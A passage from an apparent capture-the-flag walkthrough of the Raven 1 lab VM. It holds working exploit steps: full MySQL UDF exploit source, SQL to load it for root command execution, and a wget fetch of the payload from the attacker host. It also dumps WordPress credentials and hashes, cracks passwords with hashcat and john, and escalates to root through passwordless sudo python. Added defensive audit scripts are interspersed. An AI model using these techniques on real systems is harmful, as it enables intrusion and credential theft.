LinEnum.sh 100%[=====================================================>] 45.39K --.-KB/s in 0s

2020-02-15 04:46:01 (470 MB/s) - ‘LinEnum.sh’ saved [46476/46476]

michael@Raven:/tmp$ chmod 777 *
michael@Raven:/tmp$ ls
LinEnum.sh
michael@Raven:/tmp$ ls -la
total 76
drwxrwxrwt 7 root root 4096 Feb 15 04:46 .
drwxr-xr-x 22 root root 4096 Aug 13 2018 ..
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .font-unix
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .ICE-unix
-rwxrwxrwx 1 michael michael 46476 Dec 21 00:44 LinEnum.sh
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .Test-unix
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .X11-unix
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .XIM-unix

Running the script produces the following sensitive information in its output.
A MySQL service is running (port 3306 is clearly visible, bound to 127.0.0.1).

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:60286 0.0.0.0:* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::39258 :::* LISTEN -

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:8641 0.0.0.0:* -
udp 0 0 0.0.0.0:43233 0.0.0.0:* -
udp 0 0 0.0.0.0:995 0.0.0.0:* -
udp 0 0 127.0.0.1:1005 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp6 0 0 :::11443 :::* -
udp6 0 0 :::995 :::* -
udp6 0 0 :::52570 :::* -
udp6 0 0 :::111 :::* -

It flags a MySQL exploit: remote root code execution / privilege escalation!

See MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662

root       547  0.0  0.3   4340  1620 ?        S    04:11   0:00 /bin/sh /usr/bin/mysqld_safe
root 895 0.0 4.5 232508 23072 ? Ss 04:11 0:00 /usr/sbin/apache2 -k start
root 922 0.0 10.2 814920 51920 ? Sl 04:12 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
www-data 986 0.0 7.3 238928 37300 ? S 04:12 0:00 /usr/sbin/apache2 -k start
www-data 987 0.0 6.8 236172 34664 ? S 04:12 0:00 /usr/sbin/apache2 -k start
www-data 988 0.0 6.1 234084 31328 ? S 04:12 0:00 /usr/sbin/apache2 -k start

So change into /var/www/html/wordpress and look for the wp-config file, since it holds the MySQL database password.

michael@Raven:/tmp$ cd /var/www/html/wordpress
michael@Raven:/var/www/html/wordpress$ ls
index.php wp-activate.php wp-comments-post.php wp-content wp-links-opml.php wp-mail.php wp-trackback.php
license.txt wp-admin wp-config.php wp-cron.php wp-load.php wp-settings.php xmlrpc.php
readme.html wp-blog-header.php wp-config-sample.php wp-includes wp-login.php wp-signup.php
michael@Raven:/var/www/html/wordpress$ cat wp-con
wp-config.php wp-config-sample.php wp-content/
michael@Raven:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '0&ItXmn^q2d[e*yB:9,L:rR<B`h+DG,zQ&SN{Or3zalh.JE+Q!Gi:L7U[(T:J5ay');
define('SECURE_AUTH_KEY', 'y@^[*q{)NKZAKK{,AA4y-Ia*swA6/O@&*r{+RS*N!p1&a$*ctt+ I/!?A/Tip(BG');
define('LOGGED_IN_KEY', '.D4}RE4rW2C@9^Bp%#U6i)?cs7,@e]YD:R~fp#hXOk$4o/yDO8b7I&/F7SBSLPlj');
define('NONCE_KEY', '4L{Cq,%ce2?RRT7zue#R3DezpNq4sFvcCzF@zdmgL/fKpaGX:EpJt/]xZW1_H&46');
define('AUTH_SALT', '@@?u*YKtt:o/T&V;cbb`.GaJ0./S@dn$t2~n+lR3{PktK]2,*y/b%<BH-Bd#I}oE');
define('SECURE_AUTH_SALT', 'f0Dc#lKmEJi(:-3+x.V#]Wy@mCmp%njtmFb6`_80[8FK,ZQ=+HH/$& mn=]=/cvd');
define('LOGGED_IN_SALT', '}STRHqy,4scy7v >-..Hc WD*h7rnYq]H`-glDfTVUaOwlh!-/?=3u;##:Rj1]7@');
define('NONCE_SALT', 'i(#~[sXA TbJJfdn&D;0bd`p$r,~.o/?%m<H+<>Vj+,nLvX!-jjjV-o6*HDh5Td{');

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

The password is:

R@v3nSecurity

Found the first flag

michael@Raven:/var/www/html/wordpress$ find / -name "flag*" 2>/dev/null
/var/www/flag2.txt
/usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
/sys/devices/pci0000:00/0000:00:11.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
michael@Raven:/var/www/html/wordpress$ cat /var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

MySQL UDF privilege escalation

So I searched for the UDF dynamic-library exploit; in Exploit-DB it is 1518.c.

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further
* details, please refer to:
*
* http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
* http://www.wisec.it/vulns.php?page=4
* http://www.wisec.it/vulns.php?page=5
* http://www.wisec.it/vulns.php?page=6
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*
* E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
*
*/

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
    unsigned int        arg_count;      // number of arguments
    enum Item_result    *arg_type;      // pointer to item_result
    char                **args;         // pointer to arguments
    unsigned long       *lengths;       // length of string args
    char                *maybe_null;    // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
    char            maybe_null;     // 1 if func can return NULL
    unsigned int    decimals;       // for real functions
    unsigned long   max_length;     // for string functions
    char            *ptr;           // free ptr for func data
    char            const_item;     // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    if (args->arg_count != 1)
        return(0);

    system(args->args[0]);

    return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
    return(0);
}

// milw0rm.com [2006-02-20]

The exploit works by compiling the raw C code into a .so file, transferring it to the victim machine and using the MySQL weakness to run it. The first step is to compile it.

root@kali:~/vulnhub/raven1# cp /usr/share/exploitdb/exploits/linux/local/1518.c .
root@kali:~/vulnhub/raven1# ls
1518.c
root@kali:~/vulnhub/raven1# gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
root@kali:~/vulnhub/raven1# ls
1518.c 1518.so

Then start a local web server and transfer the 1518.so file to the victim's /tmp directory; that directory is world-readable and world-writable, so wget can save the file there.

root@kali:~/vulnhub/raven1# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.56.1 - - [14/Feb/2020 05:55:48] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [14/Feb/2020 05:55:55] "GET / HTTP/1.1" 200 -
192.168.56.118 - - [14/Feb/2020 05:56:12] "GET /1518.so HTTP/1.1" 200 -

michael@Raven:/tmp$ wget 192.168.56.102:8000/1518.so
--2020-02-15 05:56:10-- http://192.168.56.102:8000/1518.so
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19088 (19K) [application/octet-stream]
Saving to: ‘1518.so’

1518.so 100%[=====================================================>] 18.64K --.-KB/s in 0s

2020-02-15 05:56:10 (150 MB/s) - ‘1518.so’ saved [19088/19088]

michael@Raven:/tmp$ chmod 777 *
michael@Raven:/tmp$ ls -la
total 152
drwxrwxrwt 7 root root 4096 Feb 15 05:56 .
drwxr-xr-x 22 root root 4096 Aug 13 2018 ..
-rwxrwxrwx 1 michael michael 19088 Feb 14 21:50 1518.so
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .font-unix
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .ICE-unix
-rwxrwxrwx 1 michael michael 55193 Feb 15 04:48 info.txt
-rwxrwxrwx 1 michael michael 46476 Dec 21 00:44 LinEnum.sh
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .Test-unix
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .X11-unix
drwxrwxrwt 2 root root 4096 Feb 15 04:11 .XIM-unix

Now connect to the database and begin the escalation

michael@Raven:/tmp$ mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 70
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.01 sec)

mysql>

With a MySQL shell in hand, start exploiting the weakness just found

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

Now create a table named foo and insert into it the contents of the 1518.so file that was just copied from the local machine into /tmp. Dump that same file into /usr/lib/mysql/plugin/, the plugin directory from which mysqld loads UDF libraries. In the key step, create a UDF named do_system that calls the code implementing the function; then call it with "chmod u+s /usr/bin/find" to set the SUID bit on find.

mysql> create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/tmp/1518.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.01 sec)

mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)
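The UDF route above needs three things to line up: mysqld running as root (the --user=root in the process list), an application credential that is the MySQL root user (the wp-config.php above), and a plugin directory into which the .so can be dumped. The following Python audit is an added example, not part of the original walkthrough: it checks the first two from ps output and wp-config.php text and flags any row in mysql.func that is not on an allowlist. All sample inputs are constructed from this page's output.

```python
import re
import shlex

# Constructed sample: process-table lines taken from the LinEnum output above
# (ps aux layout: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND).
PS_LINES = [
    "root 547 0.0 0.3 4340 1620 ? S 04:11 0:00 /bin/sh /usr/bin/mysqld_safe",
    "root 922 0.0 10.2 814920 51920 ? Sl 04:12 0:00 /usr/sbin/mysqld "
    "--basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin "
    "--user=root --log-error=/var/log/mysql/error.log --port=3306",
    "www-data 986 0.0 7.3 238928 37300 ? S 04:12 0:00 /usr/sbin/apache2 -k start",
]

# Constructed sample: the database defines from the wp-config.php shown above.
WP_CONFIG = """
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'R@v3nSecurity');
define('DB_HOST', 'localhost');
"""

# Constructed sample: rows of `select * from mysql.func` after the UDF was
# registered; on a clean install this table is normally empty.
FUNC_ROWS = [
    {"name": "do_system", "ret": 2, "dl": "1518.so", "type": "function"},
]

DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)")


def parse_wp_config(text):
    """Return the DB_* constants of a wp-config.php body as a dict."""
    return {key: val for key, val in DEFINE_RE.findall(text) if key.startswith("DB_")}


def mysqld_runs_as_root(ps_lines):
    """True if a mysqld process (not the mysqld_safe wrapper, which is normally
    root and drops privileges) is owned by root or started with --user=root.
    With uid 0, a UDF's system() call also runs as root."""
    for line in ps_lines:
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue
        owner, command = fields[0], fields[10]
        argv = shlex.split(command)
        if not argv or not argv[0].endswith("/mysqld"):
            continue
        if owner == "root" or "--user=root" in argv:
            return True
    return False


def audit(ps_lines, wp_config_text, func_rows, expected_udfs=()):
    """Return a list of findings; an empty list means none of the three
    preconditions used in the walkthrough is present."""
    findings = []
    if mysqld_runs_as_root(ps_lines):
        findings.append("mysqld runs as root: any loaded UDF executes with uid 0")
    db = parse_wp_config(wp_config_text)
    if db.get("DB_USER") == "root":
        findings.append("WordPress connects as the MySQL root user: a leaked "
                        "wp-config.php hands over FILE privilege (load_file/dumpfile)")
    for row in func_rows:
        if row["name"] not in expected_udfs:
            findings.append(f"unexpected UDF {row['name']!r} loaded from "
                            f"{row['dl']!r} (check plugin_dir for the .so)")
    return findings


if __name__ == "__main__":
    for finding in audit(PS_LINES, WP_CONFIG, FUNC_ROWS):
        print("[!]", finding)
```

The fixes are the mirror image of the findings: run mysqld as the mysql user, give WordPress its own database account without the FILE privilege, and keep plugin_dir unwritable by the mysqld account.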

Now, in /tmp, use the find program to execute commands.

michael@Raven:/tmp$ touch raj
michael@Raven:/tmp$ find raj -exec "whoami" \;
root
michael@Raven:/tmp$ find raj -exec "/bin/sh" \;
# id
uid=1000(michael) gid=1000(michael) euid=0(root) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# whoami
root
# cd /root
# ls
flag4.txt
# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|


flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io

At this point the second flag has been found

Privilege escalation method two

Reach the MySQL shell as above, then take the alternative route: look through the databases and dump the usernames from the wp_users table in the wordpress database

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

Two hashes were found. Michael's password is already known, so Steven's hash was pasted into a text file named password.txt and cracked with hashcat.
The GPU is so fast that the password came out in one second

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 400 password.txt D:/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.
We are waiting for updated OpenCL drivers from Intel.
You can use --force to override, but do not report related errors.
nvmlInit(): Unknown Error

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1070, 2048/8192 MB allocatable, 16MCU

OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) UHD Graphics 630, skipped.
* Device #3: Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: D:/wordlists/rockyou.txt
* Passwords.: 14344360
* Bytes.....: 139921318
* Keyspace..: 14344360

$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/:pink84

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
Time.Started.....: Fri Feb 14 19:47:16 2020 (1 sec)
Time.Estimated...: Fri Feb 14 19:47:17 2020 (0 secs)
Guess.Base.......: File (D:/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1114.4 kH/s (7.11ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 524288/14344360 (3.66%)
Rejected.........: 0/524288 (0.00%)
Restore.Point....: 0/14344360 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8064-8192
Candidates.#1....: 123456 -> chadj85
Hardware.Mon.#1..: N/A

Started: Fri Feb 14 19:47:10 2020
Stopped: Fri Feb 14 19:47:19 2020

The password is pink84

John works as well and is more convenient, but it takes longer

root@kali:~/vulnhub/raven1# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
pink84 (?)
1g 0:00:01:17 DONE 3/3 (2020-02-14 06:52) 0.01287g/s 47616p/s 47616c/s 47616C/s poslus..pingar
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
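To see why hashcat mode 400 and john get through this hash so quickly, here is the phpass portable scheme WordPress stores in wp_users, reimplemented in Python as an added example (not code from the walkthrough or from WordPress itself): one salted MD5 followed by 2^13 chained MD5 rounds and a custom base64, with no memory hardness. The hash and password are the ones from the hashcat output above.

```python
import hashlib
import hmac

# phpass' own 64-character alphabet (not RFC 4648 base64).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Steven's hash from the wp_users dump above; hashcat recovered "pink84".
STEVEN_HASH = "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/"


def _encode64(data, count):
    """phpass encode64: packs `count` bytes little-endian, 6 bits per char.
    Mirrors the PHP loop, including its `if ($i++ >= $count) break` checks."""
    out, i = [], 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def iteration_count(stored):
    """2^count_log2, taken from the 4th character: 'B' -> 2^13 = 8192 rounds,
    matching the "iteration count is 8192" line in john's output."""
    return 1 << ITOA64.index(stored[3])


def phpass_hash(password, setting):
    """Recompute a $P$ portable hash: MD5(salt+pw), then 2^n times MD5(h+pw).
    `setting` may be a full stored hash; only its first 12 chars are used."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password, stored):
    """Constant-time check of a candidate against a stored hash, the same
    comparison wp_check_password() performs for $P$ hashes."""
    try:
        return hmac.compare_digest(phpass_hash(password, stored), stored)
    except ValueError:
        return False


if __name__ == "__main__":
    print(iteration_count(STEVEN_HASH), phpass_verify("pink84", STEVEN_HASH))
```

Because a round is a single MD5 over 22 bytes, a GPU evaluates over a million candidates per second against this format; migrating stored hashes to bcrypt or Argon2 and enforcing a password policy are the practical mitigations.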

Switch to steven's shell and run sudo -l: python can be run through sudo without a password. So spawn a PTY shell with a python one-liner.

michael@Raven:/tmp$ su steven
Password:
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@Raven:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/tmp# whoami
root
root@Raven:/tmp#
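Both local escalations on this box come down to configuration a host audit can catch: a sudo rule that hands an interpreter to a user without a password (steven's sudo -l above) and a setuid bit on a binary that can spawn commands (find after chmod u+s). The Python below is an added example, not from the original walkthrough; it parses sudo -l output and diffs a setuid file list against a baseline. The SHELL_CAPABLE set, the baseline and the samples are constructed from this page.

```python
import re

# Constructed, partial list of binaries that provide a command-execution
# primitive when run with elevated rights (python -c, find -exec, ...).
SHELL_CAPABLE = {"python", "python2", "python3", "perl", "ruby", "bash", "sh",
                 "find", "vim", "vi", "less", "awk", "env", "nmap"}

# Constructed sample: the `sudo -l` output shown above for steven.
SUDO_L_OUTPUT = """\
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
"""

# Constructed sample: setuid files (as `find / -perm -4000 -type f` would list
# them) after the UDF step ran `chmod u+s /usr/bin/find`.
SUID_PATHS = ["/usr/bin/find", "/usr/bin/passwd", "/usr/bin/sudo", "/bin/su",
              "/bin/mount", "/usr/lib/openssh/ssh-keysign"]

# Constructed baseline of setuid files expected on the host; build a real one
# from a known-good image or package manifests.
SUID_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount",
                 "/usr/lib/openssh/ssh-keysign"}

# One rule line: "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Parse the rule section of `sudo -l` into dicts: runas, nopasswd, commands."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        tags = {t.strip() for t in match.group("tags").split(":") if t.strip()}
        commands = [c.strip() for c in match.group("cmds").split(",") if c.strip()]
        rules.append({"runas": match.group("runas").strip(),
                      "nopasswd": "NOPASSWD" in tags,
                      "commands": commands})
    return rules


def _basename(command):
    first = (command.split() or [""])[0]
    return first.rsplit("/", 1)[-1]


def risky_sudo_rules(rules):
    """Rules granting ALL or a shell-capable binary: each one is a root shell."""
    findings = []
    for rule in rules:
        for command in rule["commands"]:
            if command == "ALL" or _basename(command) in SHELL_CAPABLE:
                how = "without a password" if rule["nopasswd"] else "with the user's own password"
                findings.append(f"sudo allows {command} as ({rule['runas']}) {how}")
    return findings


def unexpected_suid(paths, baseline):
    """Setuid files not in the baseline, e.g. find after `chmod u+s`."""
    return sorted(p for p in paths if p not in baseline)


def audit(sudo_l_text, suid_paths, baseline=SUID_BASELINE):
    findings = risky_sudo_rules(parse_sudo_l(sudo_l_text))
    for path in unexpected_suid(suid_paths, baseline):
        note = " (spawns commands, e.g. via -exec)" if _basename(path) in SHELL_CAPABLE else ""
        findings.append(f"setuid bit on {path} is not in the baseline{note}")
    return findings


if __name__ == "__main__":
    for finding in audit(SUDO_L_OUTPUT, SUID_PATHS):
        print("[!]", finding)
```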

As you can see, we now have a root shell

root@Raven:/tmp# find / -name "flag*" 2>/dev/null
/var/www/flag2.txt
/root/flag4.txt
/usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
